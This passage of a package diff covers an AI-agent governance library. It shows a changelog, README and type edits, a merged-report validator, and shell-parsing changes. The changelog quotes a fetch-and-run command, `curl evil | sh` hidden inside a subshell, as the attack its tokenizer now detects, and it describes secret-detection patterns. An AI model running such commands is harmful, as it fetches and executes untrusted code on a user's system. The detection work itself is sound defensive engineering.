+ - `maxSeverity(findings)`helper that returns `'none' | Severity` across a finding list.
73
+ - `validateReport(value)` — strict envelope check that also validates each contained finding and flags cross-field inconsistencies (e.g. rating below implied max).
74
+
75
+ ### AddedMerge layer
76
+ - `mergeFindings(reports, opts?)` — combine N tool reports into one normalized `MergedReport`:
77
+ - Deduplicates by `Finding.fingerprint`. Default policy: keep highest severity; `duplicatePolicy: 'first'` keeps the first occurrence.
78
+ - Optional severity `threshold` drops findings below the requested level into a counted `droppedBelowThreshold` field.
79
+ - Aggregates rating from the surviving findings, not source ratings — so threshold filtering correctly demotes the merged rating.
80
+ - Sorts findings by severity, highest first.
81
+ - Propagates `conversationId` to the merged report iff every source agrees. Cross-conversation mixing leaves the field intentionally empty so a meta-reviewer can detect misuse.
82
+ - **Never silently drops bad data**: malformed envelopes go to `invalidReports[]`, individual malformed findings go to `invalidFindings[]`. A single bad finding in a tool's report doesn't poison the rest of that report.
83
+ - `MergeOptions`, `MergeSource` (with optional `conversationId`), `MergedReport` (with optional `conversationId`), `InvalidReport`, `InvalidFinding` types.
84
+
85
+ ### AddedOpenTelemetry GenAI interop
86
+ - `docs/INTEROP-OTEL.md` — explicit cross-walk between `agent-gov-core` types and OTel's [`gen_ai.*` semantic conventions](https://opentelemetry.io/docs/specs/semconv/gen-ai/). Maps `Report.conversationId` ↔ `gen_ai.conversation.id`, documents why we adopt one bridge field and not the whole namespace, and shows a paired-emission pattern for orgs running OTel-instrumented agents alongside governance tools.
87
+
88
+ ### Added — Hardcoded secret detection (promoted from PolicyMesh)
89
+ - `matchSecret(value, options?)` scans a string for provider-prefix credentials and returns `{ provider }` (never the literal credential). Built-in patterns: Anthropic, OpenAI (sk- + sk-proj-), GitHub (PAT + classic), Slack, AWS, Google, GitLab, npm, Docker, Stripe, plus a length-restricted hex token pattern gated to env/header context to avoid commit-SHA false positives.
90
+ - `MatchSecretOptions.envOrHeaderContext` — opt-in flag for the hex token pattern.
91
+ - `SECRET_PATTERNS` — exported read-only constant table; golden-tested so additions are non-breaking but removals require a major bump.
92
+ - `SecretMatch` type.
93
+ - `env:VAR` references are never flagged (Codex notation for env-var lookups).
94
+
95
+ ### AddedException baselines (promoted + unified from PolicyMesh + TaskBound)
96
+ - `applyExceptions(findings, exceptions, now?)` suppress (or downgrade-on-expiry) findings matched by `kind` + optional `salientKey` + optional `pathPrefix`. PolicyMesh's `.policymesh-exceptions.json` shape and TaskBound's `.taskbound.yml` `ignore_kinds`/`allow_paths` shape both map cleanly onto this unified primitive.
97
+ - Expired exceptions don't silently drop they re-surface with severity downgraded to `'low'` and an `[EXPIRED WHITELIST]` message prefix so stale baselines stay visible. Reason text propagates to `finding.data.exceptionReason`.
98
+ - `validateException(value)` runtime check for well-formed exception entries.
99
+ - `Exception`, `ApplyExceptionsResult` types.
100
+
101
+ ### Tests
102
+ - 57 new cases. 220 total (up from 163). Breakdown:
103
+ - Report: 17 (schemaVersion pinning, rating derivation, explicit-rating override, validateReport accepting/rejecting envelope-level errors, finding-tool consistency, unknown property rejection, downgrade-allowed/upgrade-flagged rating consistency, conversationId passthrough + type check).
104
+ - Merge: 14 (empty input, cross-tool combine, fingerprint dedup with `highest_severity` and `first` policies, salientKey-disambiguated findings stay separate, threshold filtering, malformed report invalidReports, malformed finding invalidFindings, severity-sorted output, aggregate-rating-reflects-survivors, source provenance, conversationId agreement/disagreement/partial-coverage propagation).
105
+ - Secrets: 11 (each provider class detected, env: refs never flagged, empty/short input ignored, hex token gated to env/header context, non-hex 40-char string rejected, never-leak-literal contract, golden-pinned `SECRET_PATTERNS` provider set).
106
+ - Exceptions: 15 (empty input identity, suppress by kind/salientKey/pathPrefix, perpetual-active when no expires, expired surfacing with downgrade/prefix/reason, non-matching kind/salientKey passthrough, pathPrefix without location.file safely non-matches, malformed expires treated as never-expires, future expires stays active, validateException accept/reject paths).
107
+
108
+ ## [0.5.0] — 2026-05-22
109
+
110
+ Three additive features completing the queue from Gemini's third inspection round, plus five correctness fixes from a deep code-level inspection done before publish. No breaking changes existing exports and call signatures unchanged.
111
+
112
+ Minor bump (not patch) because the surface grew: three new top-level exports.
113
+
114
+ ### Fixed (pre-publish inspection sweep Gemini + Cody)
115
+ - `tokenizeShell` no longer splits on `&` inside file-descriptor redirections (`2>&1`, `>&2`, `<&3`). The single-`&` separator rule now checks the preceding non-whitespace character.
116
+ - `tokenizeShellDeep` no longer false-positives on `bash -c` text inside double-quoted echo arguments. Previously a whole-string regex matched `bash -c` anywhere, including data being printed. Detection now runs inside the quote-aware walk and only fires at command boundaries outside quoted regions.
117
+ - `updateMultilineStringState` (TOML locator) now tracks backslash escapes inside basic multi-line strings (`"""…"""`). An escaped `\"""` inside the value no longer prematurely terminates the string-state walker, which had caused decoy keys to match. Literal strings (`'''…'''`) intentionally don't track escapes per TOML spec.
118
+ - `lineOfTomlKey` now finds dotted keys nested under any prefix table not just at file root. `[a]\nb.c = 42` is now reachable as `a.b.c`. Same shape as the v0.4.4 top-level fix, generalized.
119
+ - `lineOfTomlKey` now matches spaced dotted keys (`a . b . c = 1`) which `parseToml` had always accepted but the locator's compact-only regex couldn't find. Pattern now builds from individual segments joined by `\s*\.\s*`.
120
+ - TOML parser correctly handles a line-ending backslash followed by trailing inline whitespace before the newline. Per spec, `"""line\ \nnext"""` strips the newline and trims leading whitespace on the next line. Previously the trailing spaces caused the backslash to be treated as a regular escape (which silently kept everything literally rather than throwing, but still wasn't spec-compliant).
121
+ - `normalizeMcpCommand` now treats common boolean long-flags (`--verbose`, `--quiet`, `--debug`, `--help`, `--version`, `--force`, `--dry-run`, `--no-cache`, `--no-color`, `--no-progress`, `--json`, plus short forms `-v -V -q -h -d`) as standalone instead of greedily pairing them with the next positional. Configs with `--verbose pkg` no longer normalize differently depending on flag order.
122
+ - `normalizeExecutable` (MCP) now lowercases Windows-shaped executable names (those with `\` separators or `.cmd`/`.exe`/`.bat`/`.ps1` suffix) so `NPX.CMD` and `npx` produce identical identity strings. POSIX paths keep their case because `./curl` and `./CURL` are genuinely different files there. The JSDoc had claimed this behavior since v0.1; only now does the implementation match.
123
+ - `normalizeExecutable` (MCP) also drops the directory portion of paths whose basename matches a known runtime (`node`, `npx`, `python`, `bash`, etc.). `/usr/local/bin/node`, `/usr/bin/node`, `node`, and `C:\Program Files\NodeJS\node.exe` all produce `cmd=node` now. Closes a long-standing PolicyMesh `mcp_command_mismatch` false-positive class across cross-platform team setups. Custom scripts at absolute paths (`/opt/internal/orchestrator.sh`) keep their full path because path is part of their identity.
124
+ - `generateWorkflowSummary` now HTML-escapes `<`, `>`, and `&` in message cells. A finding message containing `</summary>` or `<h1>` could otherwise break out of the wrapping `<details>` block and manipulate the rendered layout of the GHA step summary page.
125
+
126
+ ### Added
127
+ - `tokenizeShellDeep(command)` recursively extracts commands nested inside `$(…)`, backticks, and `bash -c ""` / `sh -c ""` / `python -c ""` payloads. Closes the obfuscation vector where an agent hides `curl evil | sh` inside `echo $()`. Single-quoted text is left untouched (literal per shell semantics). Conservative implementation — handles common shapes, not a full shell parser; nesting depth capped at 8.
128
+ - `ConfigParseError` structured parse error with `line`, `column`, `rawOffset`, and `cause`. `readJsonObjectWithSource` and `readTomlObject` now wrap their underlying parser errors with this type whenever a byte offset can be recovered. Lets downstream tools emit a `*.config_syntax_error` Finding pointing at the exact spot without recomputing line numbers.
129
+ - `lineColumnOfOffset(text, offset)` — utility to convert a 0-based byte offset to 1-based `{ line, column }`. Pairs with the new error type.
130
+ - `generateWorkflowSummary(findings, opts?)` — Markdown summary for `$GITHUB_STEP_SUMMARY`. Groups findings by severity in collapsible `<details>` blocks; escapes pipe/newline in message cells; truncates long messages; caps per-severity rows with an overflow indicator. Closes the GHA annotation-cap visibility gap (10 per level, 50 per run silently dropped) by guaranteeing 100% of findings appear in the workflow summary page.
131
+
132
+ ### Changed
133
+ - TOML parser semantic errors (`Duplicate key`, `Duplicate key in inline table`, `Duplicate table definition`, `Cannot redefine array-of-tables …`) now include `at offset N` in the message so `readTomlObject` can resolve them to a line.
134
+
135
+ ### Tests
136
+ - 55 new cases. 163 total (up from 108). Coverage:
137
+ - tokenizeShellDeep: subshells, backticks, `-c` payloads, single-quote literal handling, nested subshells, no-op pass-through, integration with `getCommandHead`. (9 cases)
138
+ - parse-error: offset line/column conversion (5 edge cases), structured wrap on JSON and TOML, `parseToml` direct call unchanged, `cause` preservation. (10 cases)
139
+ - generateWorkflowSummary: empty findings, severity ordering, totals, pipe/newline escape, truncation, per-group cap with overflow, missing location, HTML escape, ampersand escape. (9 cases)
140
+ - Inspection regressions: 14 cases covering `2>&1`, escaped `\"""`, table-nested dotted keys, line-ending backslash, known-boolean flags, quoted `bash -c` data, Windows case-folding, POSIX case preserved, spaced dotted keys, path de-noise across platforms, custom-script identity preservation.
141
+ - **Golden compatibility tests** (`test/golden.test.mjs`): 11 cases pinning specific fingerprint hashes and `normalizeMcpCommand` canonical strings. These are the contract breaking them requires a major bump and migration plan.
142
+
143
+ ## [0.4.4] 2026-05-22
144
+
145
+ Cody-led inspection (third reviewer, third round) caught five issues, two of them P0 regressions I introduced in my own v0.4.2 / v0.4.3 fixes. All five fixed here.
146
+
147
+ ### Fixed
148
+ - **P0**: `fingerprintFinding` no longer appends an empty-string segment for findings without `salientKey`. v0.4.3 added `?? ''` which silently changed the hash for every existing finding and broke the v0.4.2 → v0.4.3 backwards-compat claim in my own changelog. Pinned by a new test that asserts the specific v0.4.2-form hash for a salient-less finding.
149
+ - **P0**: TOML parser no longer rejects valid subtable headers repeated under separate array-of-tables entries. `[[fruits]] [fruits.physical] [[fruits]] [fruits.physical]` now parses correctly — each `[[fruits]]` entry resets the "already defined" status of subtable paths under that AOT. My v0.4.2 `definedTables` guard was global per-file when it should have been scoped to the current AOT entry.
150
+ - `lineOfJsonStringValue` no longer matches occurrences in key position. Searching for value `"command"` in `{"command":"npx", "args":["command"]}` now returns the array-element line, not the key. Negative lookahead `(?!\s*:)` after the closing quote.
151
+ - `lineOfTomlKey` now finds top-level dotted keys. `lineOfTomlKey('a.b.c = 1', 'a.b.c')` returns 1 instead of 0 — the dotted-key check was gated behind `inTargetTable` which is false at file root.
152
+
153
+ ### Changed
154
+ - `package-lock.json` resynced to 0.4.4. Was drifting at 0.4.2 because previous releases bumped `package.json` without running `npm install` to refresh the lockfile.
155
+
156
+ ### Tests
157
+ - 6 new cases: pinned v0.4.2-form fingerprint hash, JSON value-vs-key disambiguation (+ colon-in-value sanity check), top-level dotted TOML keys, AOT subtable repeat across entries (+ within-entry duplicate still rejected). 108 total (up from 102).
158
+
159
+ ## [0.4.3] 2026-05-22
160
+
161
+ Third Gemini-inspection round caught one confirmed bug, one disguised-as-suggestion bug, and three feature opportunities. Both bugs fixed here; the feature work is queued for v0.5.0.
162
+
163
+ ### Added
164
+ - `Finding.salientKey?: string` optional discriminator that participates in the fingerprint hash. Set this when a single (kind, file, line) site can produce multiple distinct findings (e.g. two suspicious imports on the same line, two MCP servers in the same JSON object). Without it, the meta-reviewer would dedupe them into one. Stable values only package name, server name, rule id; not timestamps or counters.
165
+ - `CreateFindingSpec.salientKey` — pass-through to the new field.
166
+ - Schema gained `salientKey` under properties (still optional, schema's `additionalProperties: false` updated to permit it).
167
+
168
+ ### Fixed
169
+ - `fingerprintFinding` now includes `salientKey` in the hash. Two distinct findings of the same kind on the same line with different `salientKey` values now produce different fingerprints. Backwards-compatible: findings without `salientKey` still produce stable, identical fingerprints to v0.4.2 for the (kind, file, line, column) tuple.
170
+ - `lineOfTomlKey` now tracks multi-line basic (`"""`) and literal (`'''`) string state and skips key matching on lines that fall inside one. Previously a decoy key inside a multi-line string value could be matched as if it were a real assignment — confirmed bug with sharper reproduction than Gemini's first-round example.
171
+
172
+ ### Tests
173
+ - 7 new regression cases. 102 total (up from 95). Covers salientKey discrimination, backwards-compat for fingerprints without salientKey, validateFinding type check, decoy-in-`"""`, decoy-in-`'''`, single-line `"""..."""` (must NOT enter multiline state), and a plain-TOML sanity check that the fix doesn't over-correct.
174
+
175
+ ## [0.4.2] 2026-05-22
176
+
177
+ External code review (Gemini, second pass) caught four correctness bugs and one source-cleanliness issue. All five fixed here.
178
+
179
+ ### Fixed
180
+ - `lineOfJsonKey` and `lineOfJsonStringValue` now JSON-encode the search input before building the regex. A caller passing the *decoded* value (e.g. `C:\Temp` from a Windows-path field) now correctly locates the JSON source bytes (`"C:\\Temp"`) instead of returning 0. Affects CapabilityEcho's `package-scripts` detector for scripts containing quotes/backslashes.
181
+ - `lineOfJsonKey` and `lineOfJsonStringValue` now scan over `stripJsonComments(text)` instead of raw text. A commented-out `"command": "fake"` no longer shadows the real key on a later line. The strip is position-preserving so returned line numbers still reference the original source.
182
+ - `getCommandHead` now strips wrapper flags (`sudo -E`, `env -i`) after recognizing a wrapper, so `sudo -E curl ...` returns `curl` instead of `-E`. SessionTrail/CapabilityEcho shell detectors no longer miss wrapped curl/wget invocations. Known limitation: short flags taking a value (`sudo -u user curl`) still misclassify as the value — documented and pinned by test.
183
+ - TOML parser now rejects a standard table header (`[items]`) that follows an array-of-tables header (`[[items]]`) with a `Cannot redefine array-of-tables` error. Previously the standard table silently descended into the array's last entry, letting writes leak into `items[0]`. Spec compliance fix.
184
+ - TOML inline-table parser now rejects duplicate keys with `Duplicate key in inline table: ...`. Previously `server = { host = "a", host = "b" }` parsed as `{ host: "b" }` — the standard-table guard wasn't mirrored on inline tables. Spec compliance fix.
185
+
186
+ ### Changed
187
+ - Source cleanup: the two `keys.join` calls in `src/toml.ts` now use a named `PATH_KEY_SEPARATOR = ''` constant instead of literal NUL bytes embedded in the source. Same runtime behavior (NUL as the delimiter, which is illegal in TOML keys so collision-proof), but `rg`/`grep` no longer treat the file as binary and `file(1)` reports it as proper text.
188
+ - README: `rankSeverity` doc corrected — was `none=0…critical=4`, actually `low=1, medium=2, high=3, critical=4`. The schema has no `none` severity.
189
+ - README: `normalizeMcpCommand` signature and behavior description corrected was listing a non-existent `serverUrl` field and claiming "resolves npx/uvx invocations" which doesn't happen. Now accurately lists: drops neutral confirm flags, strips Windows executable suffixes, sorts non-neutral flags alphabetically, preserves positional argument order, includes env + cwd in identity.
190
+
191
+ ### Added
192
+ - 7 new regression tests: encoded-value lookup, commented-out shadow, wrapper-flag unwrap (+ edge-case pin), AOT-vs-table mixing, inline-table duplicate keys.
193
+
194
+ ## [0.4.1]2026-05-22
195
+
196
+ ### Fixed
197
+ - `fingerprintFinding` now normalizes Windows-style backslash paths to forward slashes before hashing. A finding emitted on Windows and the same finding emitted in Linux CI now collapse to the same fingerprint — previously they'd diverge and break cross-platform dedupe. Caught by external code review.
198
+ - `normalizeMcpCommand` now preserves the relative order of positional arguments that appear after a flag. Previously `['--flag', 'x', 'a', 'b']` and `['--flag', 'x', 'b', 'a']` collapsed to the same canonical identity because the post-flag positional keys were co-sorted with flag pairs. PolicyMesh's `mcp_command_mismatch` would under-report under this bug. Caught by external code review.
199
+
200
+ ### Changed
201
+ - `stripJsonComments` and `stripTrailingCommas` no longer carry the dead `"'"` (single-quote) state in their string tracker — JSON strings are double-quoted only. Pure type/comment cleanup, no behavior change. Caught by external code review.
202
+
203
+ ### Added
204
+ - Regression tests for both fixes:
205
+ - `fingerprintFinding`: identical fingerprint across Windows and POSIX path separators.
206
+ - `normalizeMcpCommand`: differing post-flag positional order produces different identities; flag order independence preserved.
207
+ - `CHANGELOG.md` is now shipped in the npm tarball.
208
+
209
+ ### Internal
210
+ - `package.json` `files` allow-list trimmed to exclude `.js.map` / `.d.ts.map` sourcemaps from the published tarball. The maps referenced `src/*.ts` source files that aren't shipped, so they were dead links anyway. Tarball is ~27% smaller (32.4 kB → ~23.6 kB).
211
+
212
+ ## [0.4.0]2026-05-22
213
+
214
+ ### Added
215
+ - `JsonObjectWithSource.value` new field that mirrors `json`, populated identically. Use this in new code; `json` is kept as a populated alias.
216
+ - `TomlObjectWithSource.value` same pattern for the TOML reader.
217
+ - `lineOfTomlKey(text, dottedKey, scope?)` — optional `scope: ByteRange` parameter for parity with `lineOfJsonKey` and `lineOfJsonStringValue`. Useful when an outer locator has already pinned a parent table's range and you want to find a leaf inside it without false matches from a sibling table.
218
+
219
+ ### Deprecated
220
+ - `JsonObjectWithSource.json` — prefer `value`. Will be removed in a future major version.
221
+ - `TomlObjectWithSource.toml` — prefer `value`. Will be removed in a future major version.
222
+
223
+ ## [0.3.1] — 2026-05-22
224
+
225
+ ### Added
226
+ - Secondary entry point `agent-gov-core/test-utils` with fixtures the suite repos all hand-rolled:
227
+ - `writeFiles(dir, fileMap)` write a path-to-content map, creating parent directories.
228
+ - `makeGitRepo({initialFiles?, initialMessage?})` → `{repo, commit, head, git, cleanup}` — temp git repo on branch `main` with placeholder identity. `commit()` applies files and commits, returning the new SHA.
229
+ - `makeOldNewFixture({old, new})` → `{old, new, cleanup}` — two sibling temp directories for diff-mode CLI tests.
230
+
231
+ ## [0.3.0] — 2026-05-22
232
+
233
+ ### Added
234
+ - `createFinding({tool, name, severity, message, ...})` convenience constructor that calls `kind()` and `fingerprintFinding()` for you.
235
+ - `fingerprintFinding(finding)` — 16-char hex hash of `(kind, file, line, column)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe.
236
+ - `validateFinding(value)` — runtime check against `schemas/finding.schema.json`, returns `{ ok, errors[] }`.
237
+ - `CreateFindingSpec` and `FindingValidationResult` types.
238
+ - JSDoc `@example` blocks on `tokenizeShell`, `getCommandHead`, `normalizeMcpCommand`, `emitFindingAnnotation`.
239
+ - JSDoc on `ToolKind` explaining the schema/runtime lockstep contract.
240
+
241
+ ## [0.2.0] — earlier
242
+
243
+ ### Added
244
+ - `kind(tool, name)` typed helper that builds `<tool>.<slug>` strings.
245
+ - `isNamespacedKind(value)` runtime guard matching the JSON schema's `kind` pattern.
246
+
247
+ ### Changed
248
+ - Schema regex tightened to require namespaced kinds: `^(scope_trail|policy_mesh|capability_echo|task_bound|session_trail)\.[a-z0-9_]+$`.
249
+
250
+ ## [0.1.2] — earlier
251
+
252
+ ### Changed
253
+ - `normalizeMcpCommand` drops neutral confirm flags (`-y`, `--yes`) before canonicalization, so `npx -y foo` and `npx foo` produce the same identity.
254
+
255
+ ## [0.1.0] — earlier
256
+
257
+ Initial release. Finding schema, JSONC/TOML readers, line locators, MCP normalization, shell tokenization, and GitHub Action helpers.
package/README.md CHANGED
@@ -106,7 +106,8 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
106
106
  - `createReport({tool, findings, ...})` — sets `schemaVersion` and derives `rating` from max finding severity
107
107
  - `maxSeverity(findings)` — returns `'none' | Severity`, used by `createReport`
108
108
  - `validateReport(value)` — strict envelope check including each finding; returns `{ ok, errors[] }`
109
- - `mergeFindings(reports, opts?)` — combine N tool reports, dedupe by fingerprint, apply threshold, roll up rating; preserves both invalid envelopes and invalid findings separately so nothing is silently dropped. Propagates `conversationId` to the merged report iff every source agrees on it.
109
+ - `mergeFindings(reports, opts?)` — combine N tool reports, dedupe by fingerprint, apply threshold, roll up rating; preserves both invalid envelopes and invalid findings separately so nothing is silently dropped. Propagates `conversationId` to the merged report iff every source agrees on it. Optional `opts.workflowName` is round-tripped onto `MergedReport.workflowName` — cross-walks to OpenTelemetry's `gen_ai.workflow.name` (see [`docs/INTEROP-OTEL.md`](./docs/INTEROP-OTEL.md)).
110
+ - `validateMergedReport(value)` — strict envelope check for the merge layer's output (mirrors `validateReport` for the source side). Used by a meta-reviewer that needs to round-trip merged reports through JSON.
110
111
 
111
112
  ### Config readers
112
113
  - `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }`. When the underlying parser provides a byte offset, `parseError` is a `ConfigParseError` carrying `line`/`column`/`rawOffset` instead of a raw `Error`.
package/dist/index.d.ts CHANGED
@@ -8,7 +8,7 @@ export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
8
8
  export type { Report, CreateReportSpec, ReportValidationResult } from './report.js';
9
9
  export { REPORT_SCHEMA_VERSION, createReport, maxSeverity, validateReport, } from './report.js';
10
10
  export type { MergeOptions, MergeSource, InvalidReport, InvalidFinding, MergedReport, } from './merge.js';
11
- export { mergeFindings } from './merge.js';
11
+ export { mergeFindings, validateMergedReport } from './merge.js';
12
12
  export type { SecretMatch, MatchSecretOptions } from './secrets.js';
13
13
  export { matchSecret, SECRET_PATTERNS } from './secrets.js';
14
14
  export type { Exception, ApplyExceptionsResult } from './exceptions.js';
package/dist/index.js CHANGED
@@ -3,7 +3,7 @@ export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
3
3
  export { readTomlObject, parseToml } from './toml.js';
4
4
  export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
5
5
  export { REPORT_SCHEMA_VERSION, createReport, maxSeverity, validateReport, } from './report.js';
6
- export { mergeFindings } from './merge.js';
6
+ export { mergeFindings, validateMergedReport } from './merge.js';
7
7
  export { matchSecret, SECRET_PATTERNS } from './secrets.js';
8
8
  export { applyExceptions, validateException } from './exceptions.js';
9
9
  export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
package/dist/merge.d.ts CHANGED
@@ -12,6 +12,13 @@ export interface MergeOptions {
12
12
  * to keep the first report's finding instead. Default: `'highest_severity'`.
13
13
  */
14
14
  duplicatePolicy?: 'highest_severity' | 'first';
15
+ /**
16
+ * Optional workflow identifier propagated onto the resulting `MergedReport`.
17
+ * Cross-walks to OpenTelemetry's `gen_ai.workflow.name` so a meta-reviewer
18
+ * rolling up N tool reports for one workflow run can carry the same string
19
+ * downstream tracing already uses. See `docs/INTEROP-OTEL.md`.
20
+ */
21
+ workflowName?: string;
15
22
  }
16
23
  export interface MergeSource {
17
24
  tool: ToolKind;
@@ -52,6 +59,12 @@ export interface MergedReport {
52
59
  * mixing.
53
60
  */
54
61
  conversationId?: string;
62
+ /**
63
+ * Workflow identifier supplied by the meta-reviewer caller. Cross-walks to
64
+ * OpenTelemetry's `gen_ai.workflow.name`. Set only when explicitly passed
65
+ * via `MergeOptions.workflowName` — never inferred.
66
+ */
67
+ workflowName?: string;
55
68
  /** Deduped findings, sorted by severity (highest first). */
56
69
  findings: Finding[];
57
70
  /** Count of findings dropped because their severity was below `threshold`. */
@@ -88,4 +101,21 @@ export interface MergedReport {
88
101
  * console.log(`${merged.findings.length} unique findings across ${merged.sources.length} tools`);
89
102
  */
90
103
  export declare function mergeFindings(reports: readonly unknown[], opts?: MergeOptions): MergedReport;
104
+ /**
105
+ * Runtime check that a value conforms to the {@link MergedReport} envelope.
106
+ * Mirrors {@link validateReport} but for the merge layer's output. Does NOT
107
+ * recurse into individual findings — `mergeFindings` has already validated
108
+ * them and routed invalid ones to `invalidFindings`. The contract here is
109
+ * envelope structure plus the merge-specific counter and provenance fields.
110
+ *
111
+ * @example
112
+ * import { mergeFindings, validateMergedReport } from 'agent-gov-core';
113
+ * const merged = mergeFindings(reports, { workflowName: 'pr-1234-review' });
114
+ * const check = validateMergedReport(merged);
115
+ * if (!check.ok) throw new Error(check.errors.join('; '));
116
+ */
117
+ export declare function validateMergedReport(value: unknown): {
118
+ ok: boolean;
119
+ errors: string[];
120
+ };
91
121
  //# sourceMappingURL=merge.d.ts.map
package/dist/merge.js CHANGED
@@ -131,8 +131,115 @@ export function mergeFindings(reports, opts = {}) {
131
131
  };
132
132
  if (allSame)
133
133
  merged.conversationId = conversationIds[0];
134
+ if (opts.workflowName !== undefined)
135
+ merged.workflowName = opts.workflowName;
134
136
  return merged;
135
137
  }
138
+ const MERGED_REPORT_ALLOWED_KEYS = new Set([
139
+ 'schemaVersion',
140
+ 'sources',
141
+ 'rating',
142
+ 'conversationId',
143
+ 'workflowName',
144
+ 'findings',
145
+ 'droppedBelowThreshold',
146
+ 'duplicateCollapsed',
147
+ 'invalidReports',
148
+ 'invalidFindings',
149
+ 'severityCounts',
150
+ ]);
151
+ const MERGED_RATING_VALUES = new Set(['none', ...SEVERITIES]);
152
+ /**
153
+ * Runtime check that a value conforms to the {@link MergedReport} envelope.
154
+ * Mirrors {@link validateReport} but for the merge layer's output. Does NOT
155
+ * recurse into individual findings — `mergeFindings` has already validated
156
+ * them and routed invalid ones to `invalidFindings`. The contract here is
157
+ * envelope structure plus the merge-specific counter and provenance fields.
158
+ *
159
+ * @example
160
+ * import { mergeFindings, validateMergedReport } from 'agent-gov-core';
161
+ * const merged = mergeFindings(reports, { workflowName: 'pr-1234-review' });
162
+ * const check = validateMergedReport(merged);
163
+ * if (!check.ok) throw new Error(check.errors.join('; '));
164
+ */
165
+ export function validateMergedReport(value) {
166
+ const errors = [];
167
+ if (value === null || typeof value !== 'object' || Array.isArray(value)) {
168
+ return { ok: false, errors: ['merged report must be a plain object'] };
169
+ }
170
+ const v = value;
171
+ if (v.schemaVersion !== REPORT_SCHEMA_VERSION) {
172
+ errors.push(`schemaVersion must be '${REPORT_SCHEMA_VERSION}'`);
173
+ }
174
+ if (typeof v.rating !== 'string' || !MERGED_RATING_VALUES.has(v.rating)) {
175
+ errors.push(`rating must be one of: none, ${SEVERITIES.join(', ')}`);
176
+ }
177
+ if (!Array.isArray(v.sources)) {
178
+ errors.push('sources must be an array');
179
+ }
180
+ else {
181
+ for (let i = 0; i < v.sources.length; i++) {
182
+ const s = v.sources[i];
183
+ if (s === null || typeof s !== 'object' || Array.isArray(s)) {
184
+ errors.push(`sources[${i}] must be a plain object`);
185
+ continue;
186
+ }
187
+ const src = s;
188
+ if (!isToolKind(src.tool)) {
189
+ errors.push(`sources[${i}].tool must be one of: ${TOOL_KINDS.join(', ')}`);
190
+ }
191
+ if (typeof src.findingCount !== 'number' || !Number.isInteger(src.findingCount) || src.findingCount < 0) {
192
+ errors.push(`sources[${i}].findingCount must be a non-negative integer`);
193
+ }
194
+ if (typeof src.rating !== 'string' || !MERGED_RATING_VALUES.has(src.rating)) {
195
+ errors.push(`sources[${i}].rating must be one of: none, ${SEVERITIES.join(', ')}`);
196
+ }
197
+ if (src.toolVersion !== undefined && typeof src.toolVersion !== 'string') {
198
+ errors.push(`sources[${i}].toolVersion must be a string when present`);
199
+ }
200
+ if (src.conversationId !== undefined && typeof src.conversationId !== 'string') {
201
+ errors.push(`sources[${i}].conversationId must be a string when present`);
202
+ }
203
+ }
204
+ }
205
+ if (!Array.isArray(v.findings)) {
206
+ errors.push('findings must be an array');
207
+ }
208
+ for (const counter of ['droppedBelowThreshold', 'duplicateCollapsed']) {
209
+ const n = v[counter];
210
+ if (typeof n !== 'number' || !Number.isInteger(n) || n < 0) {
211
+ errors.push(`${counter} must be a non-negative integer`);
212
+ }
213
+ }
214
+ if (!Array.isArray(v.invalidReports))
215
+ errors.push('invalidReports must be an array');
216
+ if (!Array.isArray(v.invalidFindings))
217
+ errors.push('invalidFindings must be an array');
218
+ const counts = v.severityCounts;
219
+ if (counts === null || typeof counts !== 'object' || Array.isArray(counts)) {
220
+ errors.push('severityCounts must be a plain object');
221
+ }
222
+ else {
223
+ const c = counts;
224
+ for (const sev of SEVERITIES) {
225
+ const n = c[sev];
226
+ if (typeof n !== 'number' || !Number.isInteger(n) || n < 0) {
227
+ errors.push(`severityCounts.${sev} must be a non-negative integer`);
228
+ }
229
+ }
230
+ }
231
+ if (v.conversationId !== undefined && typeof v.conversationId !== 'string') {
232
+ errors.push('conversationId must be a string when present');
233
+ }
234
+ if (v.workflowName !== undefined && typeof v.workflowName !== 'string') {
235
+ errors.push('workflowName must be a string when present');
236
+ }
237
+ for (const key of Object.keys(v)) {
238
+ if (!MERGED_REPORT_ALLOWED_KEYS.has(key))
239
+ errors.push(`unknown property: ${key}`);
240
+ }
241
+ return { ok: errors.length === 0, errors };
242
+ }
136
243
  function candidateTool(value) {
137
244
  if (value === null || typeof value !== 'object')
138
245
  return undefined;
package/dist/shell.js CHANGED
@@ -329,19 +329,26 @@ function readQuotedArg(input, start) {
329
329
  */
330
330
  export function getCommandHead(subcommand) {
331
331
  let s = subcommand.trimStart();
332
- // Strip leading env var assignments: `FOO=bar BAZ=qux curl ...`
333
- while (true) {
334
- const m = /^([A-Za-z_][A-Za-z0-9_]*)=([^\s'"]*|"[^"]*"|'[^']*')\s+/.exec(s);
335
- if (!m)
332
+ // Iterative wrapper-stripping. Was previously recursive; a pathological input
333
+ // like `sudo sudo sudo … curl` (20k repetitions) could blow the JS stack
334
+ // since V8 does not reliably do tail-call optimization. The 64-iteration cap
335
+ // is well above any plausible legitimate wrapper chain (`sudo nohup env …`)
336
+ // while still bounding worst-case time.
337
+ for (let depth = 0; depth < 64; depth++) {
338
+ // Strip leading env var assignments: `FOO=bar BAZ=qux curl ...`
339
+ while (true) {
340
+ const m = /^([A-Za-z_][A-Za-z0-9_]*)=([^\s'"]*|"[^"]*"|'[^']*')\s+/.exec(s);
341
+ if (!m)
342
+ break;
343
+ s = s.slice(m[0].length);
344
+ }
345
+ // Strip leading sudo / env wrappers, then also strip any wrapper flags
346
+ // (`sudo -E`, `env -i`) and embedded env vars (`env FOO=1 BAZ=qux curl`)
347
+ // before re-checking. Without this, `sudo -E curl` would return `-E`.
348
+ const wrapperMatch = /^(sudo|nohup|env|exec|command|builtin|stdbuf|nice|ionice|setsid)\s+(.*)$/.exec(s);
349
+ if (!wrapperMatch)
336
350
  break;
337
- s = s.slice(m[0].length);
338
- }
339
- // Strip leading sudo / env wrappers, then also strip any wrapper flags
340
- // (`sudo -E`, `env -i`) and embedded env vars (`env FOO=1 BAZ=qux curl`)
341
- // before recursing. Without this, `sudo -E curl` would return `-E`.
342
- const wrapperMatch = /^(sudo|nohup|env|exec|command|builtin|stdbuf|nice|ionice|setsid)\s+(.*)$/.exec(s);
343
